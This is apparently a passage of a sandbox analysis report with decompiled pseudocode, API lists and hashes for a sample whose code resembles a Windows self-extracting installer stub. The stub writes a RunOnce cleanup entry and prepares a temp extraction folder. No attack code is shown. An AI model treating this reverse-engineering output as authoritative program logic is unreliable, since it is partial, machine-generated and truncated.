                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    				intOrPtr _t7;
                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                    				struct HINSTANCE__* _t12;
                                                                                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                                                                                    				signed char _t19;
                                                                                                                                                                                                    				intOrPtr* _t21;
                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t4 = GetVersion();
                                                                                                                                                                                                    				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                    					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                    					if(_t12 != 0) {
                                                                                                                                                                                                    						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                    						if(_t21 != 0) {
                                                                                                                                                                                                    							_t17 = _t21;
                                                                                                                                                                                                    							 *0x39a288(0, 1, 0, 0);
                                                                                                                                                                                                    							 *_t21();
                                                                                                                                                                                                    							_t29 = _t24 - _t24;
                                                                                                                                                                                                    							if(_t24 != _t24) {
                                                                                                                                                                                                    								_t17 = 4;
                                                                                                                                                                                                    								asm("int 0x29");
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t20 = _a12;
                                                                                                                                                                                                    				_t18 = _a4;
                                                                                                                                                                                                    				 *0x399124 = 0;
                                                                                                                                                                                                    				if(E00392CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                    					_t9 = E00392F1D(_t18, _t20); // executed
                                                                                                                                                                                                    					_t22 = _t9; // executed
                                                                                                                                                                                                    					E003952B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                    					if(_t22 != 0) {
                                                                                                                                                                                                    						_t32 =  *0x398a3a; // 0x0
                                                                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                                                                    							_t19 =  *0x399a2c; // 0x0
                                                                                                                                                                                                    							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                    								E00391F90(_t19, _t21, _t22);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t6 =  *0x398588; // 0x0
                                                                                                                                                                                                    				if(_t6 != 0) {
                                                                                                                                                                                                    					CloseHandle(_t6);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t7 =  *0x399124; // 0x80070002
                                                                                                                                                                                                    				return _t7;
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x00392c03
                                                                                                                                                                                                    0x00392c0d
                                                                                                                                                                                                    0x00392c18
                                                                                                                                                                                                    0x00392c20
                                                                                                                                                                                                    0x00392c2e
                                                                                                                                                                                                    0x00392c32
                                                                                                                                                                                                    0x00392c36
                                                                                                                                                                                                    0x00392c3d
                                                                                                                                                                                                    0x00392c43
                                                                                                                                                                                                    0x00392c45
                                                                                                                                                                                                    0x00392c47
                                                                                                                                                                                                    0x00392c49
                                                                                                                                                                                                    0x00392c4e
                                                                                                                                                                                                    0x00392c4e
                                                                                                                                                                                                    0x00392c47
                                                                                                                                                                                                    0x00392c32
                                                                                                                                                                                                    0x00392c20
                                                                                                                                                                                                    0x00392c50
                                                                                                                                                                                                    0x00392c54
                                                                                                                                                                                                    0x00392c57
                                                                                                                                                                                                    0x00392c64
                                                                                                                                                                                                    0x00392c66
                                                                                                                                                                                                    0x00392c6b
                                                                                                                                                                                                    0x00392c6d
                                                                                                                                                                                                    0x00392c74
                                                                                                                                                                                                    0x00392c76
                                                                                                                                                                                                    0x00392c7c
                                                                                                                                                                                                    0x00392c7e
                                                                                                                                                                                                    0x00392c87
                                                                                                                                                                                                    0x00392c89
                                                                                                                                                                                                    0x00392c89
                                                                                                                                                                                                    0x00392c87
                                                                                                                                                                                                    0x00392c7c
                                                                                                                                                                                                    0x00392c74
                                                                                                                                                                                                    0x00392c8e
                                                                                                                                                                                                    0x00392c95
                                                                                                                                                                                                    0x00392c98
                                                                                                                                                                                                    0x00392c98
                                                                                                                                                                                                    0x00392c9e
                                                                                                                                                                                                    0x00392ca7

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersion.KERNEL32(?,00000002,00000000,?,00396BB0,00390000,00000000,00000002,0000000A), ref: 00392C03
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00396BB0,00390000,00000000,00000002,0000000A), ref: 00392C18
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00392C28
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00396BB0,00390000,00000000,00000002,0000000A), ref: 00392C98
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                    • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                    • API String ID: 62482547-3460614246
                                                                                                                                                                                                    • Opcode ID: 881c7fa91edd4eda45107672ffe956e579aea758158084747bb8e82a7d7666e1
                                                                                                                                                                                                    • Instruction ID: a3600abe7c5092d751f4c667fefcd56e1c0a7ed84e4092788b7378542d12188d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 881c7fa91edd4eda45107672ffe956e579aea758158084747bb8e82a7d7666e1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E211C231201A067BDF237BB9AC89E6F375DAB89390F060517FD41E7251DA32DC418AA5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00396F40() {
                                                                                                                                                                                                    
                                                                                                                                                                                                    				SetUnhandledExceptionFilter(E00396EF0); // executed
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}



                                                                                                                                                                                                    0x00396f45
                                                                                                                                                                                                    0x00396f4d

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00396F45
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                    • Opcode ID: 02c7f93cbabe2fe458ba9c765fe0eb0c140e13df05532069b333c02a0bcc4ee6
                                                                                                                                                                                                    • Instruction ID: 14b7a42205eb2cf94190f0a01e030c7a9f1a42202129acacadc9c2801816f0ca
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02c7f93cbabe2fe458ba9c765fe0eb0c140e13df05532069b333c02a0bcc4ee6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7790026465250047DA121B749E1A45575995A4D783F815561E011C4494DB6144405552
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E0039202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				char _v528;
                                                                                                                                                                                                    				void* _v532;
                                                                                                                                                                                                    				int _v536;
                                                                                                                                                                                                    				int _v540;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                                                    				long _t36;
                                                                                                                                                                                                    				long _t41;
                                                                                                                                                                                                    				struct HINSTANCE__* _t46;
                                                                                                                                                                                                    				intOrPtr _t49;
                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                    				CHAR* _t54;
                                                                                                                                                                                                    				void _t56;
                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                    				intOrPtr* _t72;
                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                    				intOrPtr* _t81;
                                                                                                                                                                                                    				void* _t86;
                                                                                                                                                                                                    				void* _t87;
                                                                                                                                                                                                    				void* _t90;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                                                    				void* _t94;
                                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t79 = __edx;
                                                                                                                                                                                                    				_t28 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                    				_t84 = 0x104;
                                                                                                                                                                                                    				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                    				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                    				_t95 = _t94 + 0x18;
                                                                                                                                                                                                    				_t66 = 0;
                                                                                                                                                                                                    				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                    				if(_t36 != 0) {
                                                                                                                                                                                                    					L24:
                                                                                                                                                                                                    					return E00396CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(_t86);
                                                                                                                                                                                                    				_t87 = 0;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					E0039171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                    					_t95 = _t95 + 0x10;
                                                                                                                                                                                                    					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                    					if(_t41 != 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t87 = _t87 + 1;
                                                                                                                                                                                                    					if(_t87 < 0xc8) {
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					break;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t87 != 0xc8) {
                                                                                                                                                                                                    					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                    					_t79 = _t84;
                                                                                                                                                                                                    					E0039658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                    					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                    					_t84 = _t46;
                                                                                                                                                                                                    					if(_t84 == 0) {
                                                                                                                                                                                                    						L10:
                                                                                                                                                                                                    						if(GetModuleFileNameA( *0x399a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                    							L17:
                                                                                                                                                                                                    							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                    							_pop(_t86);
                                                                                                                                                                                                    							goto L24;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                    						_t72 =  &_v268;
                                                                                                                                                                                                    						_t80 = _t72 + 1;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t49 =  *_t72;
                                                                                                                                                                                                    							_t72 = _t72 + 1;
                                                                                                                                                                                                    						} while (_t49 != 0);
                                                                                                                                                                                                    						_t73 = _t72 - _t80;
                                                                                                                                                                                                    						_t81 = 0x3991e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t50 =  *_t81;
                                                                                                                                                                                                    							_t81 = _t81 + 1;
                                                                                                                                                                                                    						} while (_t50 != 0);
                                                                                                                                                                                                    						_t84 = _t73 + 0x50 + _t81 - 0x3991e5;
                                                                                                                                                                                                    						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x3991e5);
                                                                                                                                                                                                    						if(_t90 != 0) {
                                                                                                                                                                                                    							 *0x398580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                    							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                    							if(_t66 == 0) {
                                                                                                                                                                                                    								_t54 = "%s /D:%s";
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                    							E0039171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                    							_t75 = _t90;
                                                                                                                                                                                                    							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                    							_t79 = _t23;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t56 =  *_t75;
                                                                                                                                                                                                    								_t75 = _t75 + 1;
                                                                                                                                                                                                    							} while (_t56 != 0);
                                                                                                                                                                                                    							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                    							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                    							RegCloseKey(_v532); // executed
                                                                                                                                                                                                    							_t36 = LocalFree(_t90);
                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t79 = 0x4b5;
                                                                                                                                                                                                    						E003944B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                    						goto L17;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                    					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                    					FreeLibrary(_t84); // executed
                                                                                                                                                                                                    					if(_t91 == 0) {
                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    						E0039658A( &_v268, 0x104, 0x391140);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                    				 *0x398530 = _t66;
                                                                                                                                                                                                    				goto L23;
                                                                                                                                                                                                    			}

































                                                                                                                                                                                                    0x0039202a
                                                                                                                                                                                                    0x00392035
                                                                                                                                                                                                    0x0039203c
                                                                                                                                                                                                    0x00392041
                                                                                                                                                                                                    0x00392050
                                                                                                                                                                                                    0x0039205f
                                                                                                                                                                                                    0x00392064
                                                                                                                                                                                                    0x0039206f
                                                                                                                                                                                                    0x0039208c
                                                                                                                                                                                                    0x00392094
                                                                                                                                                                                                    0x00392257
                                                                                                                                                                                                    0x00392266
                                                                                                                                                                                                    0x00392266
                                                                                                                                                                                                    0x0039209a
                                                                                                                                                                                                    0x0039209b
                                                                                                                                                                                                    0x0039209d
                                                                                                                                                                                                    0x003920aa
                                                                                                                                                                                                    0x003920af
                                                                                                                                                                                                    0x003920c9
                                                                                                                                                                                                    0x003920d1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003920d3
                                                                                                                                                                                                    0x003920da
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003920da
                                                                                                                                                                                                    0x003920e2
                                                                                                                                                                                                    0x00392103
                                                                                                                                                                                                    0x0039210e
                                                                                                                                                                                                    0x00392116
                                                                                                                                                                                                    0x00392122
                                                                                                                                                                                                    0x00392128
                                                                                                                                                                                                    0x0039212c
                                                                                                                                                                                                    0x00392179
                                                                                                                                                                                                    0x00392194
                                                                                                                                                                                                    0x003921de
                                                                                                                                                                                                    0x003921e4
                                                                                                                                                                                                    0x00392256
                                                                                                                                                                                                    0x00392256
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392256
                                                                                                                                                                                                    0x00392196
                                                                                                                                                                                                    0x00392196
                                                                                                                                                                                                    0x0039219c
                                                                                                                                                                                                    0x0039219f
                                                                                                                                                                                                    0x0039219f
                                                                                                                                                                                                    0x003921a1
                                                                                                                                                                                                    0x003921a2
                                                                                                                                                                                                    0x003921a6
                                                                                                                                                                                                    0x003921a8
                                                                                                                                                                                                    0x003921b0
                                                                                                                                                                                                    0x003921b0
                                                                                                                                                                                                    0x003921b2
                                                                                                                                                                                                    0x003921b3
                                                                                                                                                                                                    0x003921bc
                                                                                                                                                                                                    0x003921c7
                                                                                                                                                                                                    0x003921cb
                                                                                                                                                                                                    0x003921f1
                                                                                                                                                                                                    0x003921f6
                                                                                                                                                                                                    0x003921fd
                                                                                                                                                                                                    0x003921ff
                                                                                                                                                                                                    0x003921ff
                                                                                                                                                                                                    0x00392204
                                                                                                                                                                                                    0x00392213
                                                                                                                                                                                                    0x00392218
                                                                                                                                                                                                    0x0039221d
                                                                                                                                                                                                    0x0039221d
                                                                                                                                                                                                    0x00392220
                                                                                                                                                                                                    0x00392220
                                                                                                                                                                                                    0x00392222
                                                                                                                                                                                                    0x00392223
                                                                                                                                                                                                    0x00392229
                                                                                                                                                                                                    0x0039223d
                                                                                                                                                                                                    0x00392249
                                                                                                                                                                                                    0x00392250
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392250
                                                                                                                                                                                                    0x003921d2
                                                                                                                                                                                                    0x003921d9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003921d9
                                                                                                                                                                                                    0x0039213a
                                                                                                                                                                                                    0x00392141
                                                                                                                                                                                                    0x00392144
                                                                                                                                                                                                    0x0039214c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392163
                                                                                                                                                                                                    0x00392172
                                                                                                                                                                                                    0x00392172
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392163
                                                                                                                                                                                                    0x003920ea
                                                                                                                                                                                                    0x003920f0
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCRT ref: 00392050
                                                                                                                                                                                                    • memset.MSVCRT ref: 0039205F
                                                                                                                                                                                                    • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0039208C
                                                                                                                                                                                                      • Part of subcall function 0039171E: _vsnprintf.MSVCRT ref: 00391750
                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003920C9
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003920EA
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00392103
                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00392122
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00392134
                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00392144
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 0039215B
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0039218C
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003921C1
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003921E4
                                                                                                                                                                                                    • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0039223D
                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00392249
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00392250
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                    • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                                                                                                                                                    • API String ID: 178549006-850274211
                                                                                                                                                                                                    • Opcode ID: a827c4330dbc607ab595082f7f710cb5f4d77f1a3a24ba94bd03f5645fac636e
                                                                                                                                                                                                    • Instruction ID: 25b1207ff73be59250de95b6f9a9fcd540895c53daf6b14951a59b72ab9f6c32
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a827c4330dbc607ab595082f7f710cb5f4d77f1a3a24ba94bd03f5645fac636e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15510775A00614BBDF239B64DC49FFB773CEB45700F0102AAF949E7250DA729D498B90
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 232 3955a0-3955d9 call 39468f LocalAlloc 235 3955db-3955f1 call 3944b9 call 396285 232->235 236 3955fd-39560c call 39468f 232->236 250 3955f6-3955f8 235->250 242 39560e-395630 call 3944b9 LocalFree 236->242 243 395632-395643 lstrcmpA 236->243 242->250 246 39564b-395659 LocalFree 243->246 247 395645 243->247 248 39565b-39565d 246->248 249 395696-39569c 246->249 247->246 252 395669 248->252 253 39565f-395667 248->253 255 39589f-3958b5 call 396517 249->255 256 3956a2-3956a8 249->256 254 3958b7-3958c7 call 396ce0 250->254 257 39566b-39567a call 395467 252->257 253->252 253->257 255->254 256->255 260 3956ae-3956c1 GetTempPathA 256->260 269 39589b-39589d 257->269 270 395680-395691 call 3944b9 257->270 264 3956f3-395711 call 391781 260->264 265 3956c3-3956c9 call 395467 260->265 274 39586c-395890 GetWindowsDirectoryA call 39597d 264->274 275 395717-395729 GetDriveTypeA 264->275 272 3956ce-3956d0 265->272 269->254 270->250 272->269 276 3956d6-3956df call 392630 272->276 274->264 286 395896 274->286 280 39572b-39572e 275->280 281 395730-395740 GetFileAttributesA 275->281 276->264 287 3956e1-3956ed call 395467 276->287 280->281 284 395742-395745 280->284 281->284 285 39577e-39578f call 39597d 281->285 289 39576b 284->289 290 395747-39574f 284->290 297 395791-39579e call 392630 285->297 298 3957b2-3957bf call 392630 285->298 286->269 287->264 287->269 292 395771-395779 289->292 290->292 294 395751-395753 290->294 296 395864-395866 292->296 294->292 299 395755-395762 call 396952 294->299 296->274 296->275 297->289 309 3957a0-3957b0 call 39597d 297->309 306 3957c1-3957cd GetWindowsDirectoryA 298->306 307 3957d3-3957f8 call 39658a GetFileAttributesA 298->307 299->289 308 395764-395769 299->308 306->307 314 39580a 307->314 315 3957fa-395808 CreateDirectoryA 307->315 308->285 308->289 309->289 309->298 316 39580d-39580f 314->316 315->316 317 395811-395825 316->317 318 395827-39585c SetFileAttributesA call 391781 call 395467 316->318 317->296 318->269 323 39585e 318->323 323->296
                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                    			E003955A0(void* __eflags) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v265;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                                                    				int _t32;
                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                    				int _t35;
                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                    				signed int _t38;
                                                                                                                                                                                                    				int _t40;
                                                                                                                                                                                                    				int _t44;
                                                                                                                                                                                                    				long _t48;
                                                                                                                                                                                                    				int _t49;
                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                    				int _t54;
                                                                                                                                                                                                    				int _t59;
                                                                                                                                                                                                    				char _t60;
                                                                                                                                                                                                    				int _t65;
                                                                                                                                                                                                    				char _t66;
                                                                                                                                                                                                    				int _t67;
                                                                                                                                                                                                    				int _t68;
                                                                                                                                                                                                    				int _t69;
                                                                                                                                                                                                    				int _t70;
                                                                                                                                                                                                    				int _t71;
                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                    				int _t73;
                                                                                                                                                                                                    				CHAR* _t82;
                                                                                                                                                                                                    				CHAR* _t88;
                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                    				signed int _t110;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t28 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                    				_t2 = E0039468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                    				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                    				if(_t109 != 0) {
                                                                                                                                                                                                    					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                    					_t32 = E0039468F(_t82, _t109, 1);
                                                                                                                                                                                                    					__eflags = _t32;
                                                                                                                                                                                                    					if(_t32 != 0) {
                                                                                                                                                                                                    						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                    						__eflags = _t33;
                                                                                                                                                                                                    						if(_t33 == 0) {
                                                                                                                                                                                                    							 *0x399a30 = 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						LocalFree(_t109);
                                                                                                                                                                                                    						_t35 =  *0x398b3e; // 0x0
                                                                                                                                                                                                    						__eflags = _t35;
                                                                                                                                                                                                    						if(_t35 == 0) {
                                                                                                                                                                                                    							__eflags =  *0x398a24; // 0x0
                                                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                                                    								L46:
                                                                                                                                                                                                    								_t101 = 0x7d2;
                                                                                                                                                                                                    								_t36 = E00396517(_t82, 0x7d2, 0, E00393210, 0, 0);
                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                    								_t38 =  ~( ~_t36);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								__eflags =  *0x399a30; // 0x0
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									goto L46;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t109 = 0x3991e4;
                                                                                                                                                                                                    									_t40 = GetTempPathA(0x104, 0x3991e4);
                                                                                                                                                                                                    									__eflags = _t40;
